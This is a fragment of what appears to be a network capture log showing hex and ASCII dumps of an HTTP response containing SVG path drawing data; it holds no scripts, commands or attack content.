                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2370INData Raw: 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                                        Data Ascii: 09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class=
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2386INData Raw: 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 31 33 2c 31 38 34 2e 38 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                                                        Data Ascii: 3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"></path><path class="cls-9" d="M331.13,184.83a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2402INData Raw: 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 36 2e 36 39 2c 32 36 34 2e 34 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                                        Data Ascii: 67,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9" d="M366.69,264.49a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2418INData Raw: 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2c 33 33 36 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: ,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M402,336.08a2,2,0,0,1-.9,2.6,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2434INData Raw: 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61
                                                                                                                                                                                                                                                                                        Data Ascii: -3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><pa
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2450INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2c 32 36 31 2e 34 34 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c
                                                                                                                                                                                                                                                                                        Data Ascii: "></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M457,261.44a2,2,0,0,1-.91,2.6,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2466INData Raw: 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 32 35 2c 33 33 33 61 32 2c 32 2c 30 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: ,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M492.25,333a2,2,0,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2482INData Raw: 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                        Data Ascii: 2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2498INData Raw: 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 32 34 2c 32 35 38 2e 33 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38
                                                                                                                                                                                                                                                                                        Data Ascii: 33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.24,258.38a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2514INData Raw: 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2530INData Raw: 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2546INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 34 38 2c 38 38 2e 37 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c
                                                                                                                                                                                                                                                                                        Data Ascii: .67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.48,88.71a1.6,1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2562INData Raw: 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 39 2e 38 2c 31 34 36 2e 31 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M389.8,146.16a1.61,1.61,0,0,1-.73,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2578INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 33
                                                                                                                                                                                                                                                                                        Data Ascii: .24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.3
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2594INData Raw: 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                                                        Data Ascii: 34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2,0,0,1,.15,2.68"></path><
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2610INData Raw: 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c 31 34 33 2e 37 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: ,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,143.71a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2626INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 37 2e 38 34 2c 31 39 2e 38 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: s-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M477.84,19.88a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.
